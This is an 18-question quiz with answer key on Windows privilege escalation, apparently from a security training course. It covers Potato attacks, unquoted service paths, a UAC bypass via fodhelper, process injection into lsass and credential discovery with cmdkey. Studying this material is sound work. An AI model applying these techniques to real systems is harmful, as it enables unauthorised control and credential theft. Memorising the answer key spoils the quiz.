Chapter 16 Quiz: Windows Exploitation and Privilege Escalation

1. Which Windows privilege allows a service account to impersonate client tokens and is the prerequisite for Potato-family attacks?

A) SeDebugPrivilege B) SeImpersonatePrivilege C) SeBackupPrivilege D) SeTakeOwnershipPrivilege

2. A service has the following unquoted path: C:\Program Files\Custom App\Service Manager\svc.exe. In what order does Windows attempt to resolve this?

A) C:\Program.exe, C:\Program Files\Custom.exe, C:\Program Files\Custom App\Service.exe, then the full path B) The full path only C) svc.exe in the current directory, then the full path D) C:\Program Files\Custom App\Service Manager\svc.exe only

3. What does the whoami /priv command display?

A) All users on the system B) Current user's file permissions C) Current user's Windows privileges and their states D) Current user's password hash

4. Which automated tool is the Windows equivalent of LinPEAS?

A) Nmap B) WinPEAS C) Bloodhound D) Mimikatz

5. The AlwaysInstallElevated registry key must be set to 1 in which locations to be exploitable?

A) HKLM only B) HKCU only C) Both HKLM and HKCU D) Neither; it is always exploitable if the service exists

6. What is the primary attack that exploits SeImpersonatePrivilege on modern Windows systems?

A) Pass-the-Hash B) Kerberoasting C) PrintSpoofer or GodPotato D) DLL hijacking

7. HiveNightmare (CVE-2021-36934) allows standard users to read which critical files?

A) The Windows Event Logs B) SAM, SYSTEM, and SECURITY registry hives via Volume Shadow Copies C) The Active Directory database (NTDS.dit) D) Group Policy Objects in SYSVOL

8. Which Windows integrity level indicates a process is running with elevated administrator privileges?

A) Low Mandatory Level B) Medium Mandatory Level C) High Mandatory Level D) System Mandatory Level

9. In DLL hijacking, which of the following is the FIRST location Windows searches for a DLL (with SafeDllSearchMode enabled)?

A) The current working directory B) The Windows system directory (System32) C) The directory from which the application loaded D) Directories listed in the PATH environment variable

10. PrintNightmare (CVE-2021-34527) exploited a vulnerability in which Windows service?

A) Task Scheduler B) Windows Update C) Print Spooler D) Remote Desktop

11. You discover a service running as SYSTEM whose binary is writable by your user. What is the exploitation approach?

A) Modify the binary's configuration file B) Replace the binary with a payload, then restart the service C) Inject code into the running service process D) Change the service's start type to disabled

12. PowerUp's Invoke-AllChecks function performs which of the following?

A) Exploits all found vulnerabilities automatically B) Runs all privilege escalation enumeration checks and reports findings C) Patches all discovered vulnerabilities D) Creates a new administrator account

13. Which UAC bypass technique abuses the fodhelper.exe auto-elevation behavior?

A) Modifying the HKCU registry key ms-settings\Shell\Open\command to execute arbitrary commands B) Injecting a DLL into the fodhelper.exe process C) Replacing fodhelper.exe with a malicious binary D) Using fodhelper.exe to load a kernel driver

14. A user account has SeDebugPrivilege enabled. What is the most impactful exploitation technique?

A) Reading registry keys B) Injecting code into SYSTEM-level processes like lsass.exe or winlogon.exe C) Modifying service configurations D) Creating scheduled tasks

15. Which of the following best describes the function of AMSI (Antimalware Scan Interface)?

A) A firewall component that blocks network-based attacks B) A scan interface that inspects PowerShell, VBScript, and JScript content before execution C) An encryption mechanism for stored credentials D) A kernel-level exploit mitigation technology

16. When performing Windows privilege escalation enumeration, which command reveals stored credentials that can be used with runas /savecred?

A) net user B) cmdkey /list C) reg query HKLM\SAM D) whoami /groups

17. What is the key difference between WinPEAS and Seatbelt?

A) WinPEAS is for Linux; Seatbelt is for Windows B) WinPEAS focuses on privilege escalation vectors; Seatbelt focuses on broader security posture enumeration C) Seatbelt requires administrator privileges; WinPEAS does not D) WinPEAS is written in PowerShell; Seatbelt is a bash script

18. You have a shell as NT AUTHORITY\NETWORK SERVICE. Which privilege do you most likely have that enables Potato attacks?

A) SeShutdownPrivilege B) SeImpersonatePrivilege C) SeRemoteShutdownPrivilege D) SeChangeNotifyPrivilege

Answer Key

  1. B - SeImpersonatePrivilege allows impersonating client tokens and is required for Potato attacks.
  2. A - Windows tries each space-delimited interpretation in order: Program.exe, then Custom.exe, then Service.exe, then the full path.
  3. C - whoami /priv displays the current user's Windows privileges and whether they are Enabled or Disabled.
  4. B - WinPEAS is the Windows counterpart to LinPEAS for automated privilege escalation enumeration.
  5. C - AlwaysInstallElevated must be set to 1 in both HKLM and HKCU to be exploitable.
  6. C - PrintSpoofer and GodPotato are modern exploits for SeImpersonatePrivilege on current Windows versions.
  7. B - HiveNightmare allows reading SAM, SYSTEM, and SECURITY registry hive backups through Volume Shadow Copies.
  8. C - High Mandatory Level indicates an elevated administrator process.
  9. C - The application's own directory is searched first in the standard DLL search order.
  10. C - PrintNightmare exploited vulnerabilities in the Windows Print Spooler service.
  11. B - Replace the writable service binary with a payload and restart the service to execute as SYSTEM.
  12. B - Invoke-AllChecks runs all enumeration checks and reports findings for manual exploitation.
  13. A - The fodhelper bypass sets the HKCU registry command handler to execute arbitrary commands during auto-elevation.
  14. B - SeDebugPrivilege allows injecting into any process, including SYSTEM processes like lsass.exe.
  15. B - AMSI inspects script content (PowerShell, VBS, JScript) before execution to detect malicious code.
  16. B - cmdkey /list shows credentials stored in the Windows Credential Manager usable with runas /savecred.
  17. B - WinPEAS focuses specifically on privilege escalation; Seatbelt provides broader security posture assessment.
  18. B - NETWORK SERVICE typically has SeImpersonatePrivilege, enabling Potato-family attacks.